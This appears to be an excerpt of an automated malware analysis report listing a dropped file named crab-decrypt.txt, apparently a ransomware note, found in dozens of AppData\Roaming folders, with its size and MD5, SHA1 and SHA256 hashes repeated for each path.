c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\collab\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\forms\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\jscache\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\security\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\acrobat\dc\security\crlcache\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\flash player\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\flash player\assetcache\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\flash player\assetcache\nahqnpmn\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\flash player\nativecache\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\headlights\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\linguistics\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\logtransport2\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\logtransport2\logs\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\sonar\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\adobe\sonar\sonar1.0\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\identities\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\identities\{ca8ca1bb-f2a6-4e9c-b7cc-fb56671763e8}\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\macromedia\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\macromedia\flash player\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\macromedia\flash player\#sharedobjects\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\macromedia\flash player\#sharedobjects\dqqhjz8c\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\macromedia\flash player\macromedia.com\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\macromedia\flash player\macromedia.com\support\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\access\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\addins\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\bibliography\style\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\credentials\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\crypto\rsa\s-1-5-21-1462094071-1423818996-289466292-1000\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\document building blocks\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\document building blocks\1033\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\document building blocks\1033\16\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\excel\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\excel\xlstart\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\internet explorer\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\internet explorer\quick launch\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\implicitappshortcuts\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\internet explorer\quick launch\user pinned\taskbar\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\internet explorer\userdata\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\internet explorer\userdata\low\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\mmc\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\ms project\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\ms project\16\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\ms project\16\en-us\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\network\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\network\connections\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\network\connections\pbk\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\network\connections\pbk\_hiddenpbk\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\office\recent\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\onenote\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\onenote\16.0\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\outlook\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\powerpoint\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\proof\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\protect\s-1-5-21-1462094071-1423818996-289466292-1000\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\publisher\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\publisher building blocks\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\speech\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\systemcertificates\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\systemcertificates\my\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\systemcertificates\my\certificates\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\systemcertificates\my\crls\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\systemcertificates\my\ctls\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\document themes\1033\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\managed\smartart graphics\1033\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\user\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\user\document themes\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\user\document themes\1033\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\user\smartart graphics\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\templates\livecontent\16\user\smartart graphics\1033\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\uproof\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\vault\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
c:\users\ciihmnxmn6ps\appdata\roaming\microsoft\word\crab-decrypt.txt 3.20 KB MD5: c0f9e48bf74053ad638796ebbcb2bdf1
SHA1: 32174c0dcfe1d01838ecb03c22f6991065d9890a
SHA256: dda64d29b501f41856c7888de2a276bd73ab9fc3bba5155fe373230fc9e18082 		False
...
